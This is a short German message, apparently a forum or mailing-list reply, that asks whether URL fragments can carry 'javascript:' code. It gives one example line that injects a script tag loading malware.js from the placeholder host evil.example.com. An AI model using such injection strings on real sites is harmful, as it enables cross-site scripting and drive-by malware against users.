Hallo Felix,

spinnen wir doch diesen gefährlichen Gedanken einmal weiter:

domain.tld?key=value#javascript:document.body.innerHTML+='<script type="text/javascript" src="http://evil.example.com/malware.js"></script>'

Das ist mir durchaus klar, und eben ziemlich genau das an das ich mich erinnere bei Facebook gesehen zu haben. Aber eben es kann genau so gut eine XSS lücke gewesen sein, bis heute habe ich nicht weiter daran gedacht.

Trotzdem möchte ich mich eigentlich nicht ganz mit deiner Antwort zufrieden geben ;)
Gibt es denn wirklich nichts dergleichen?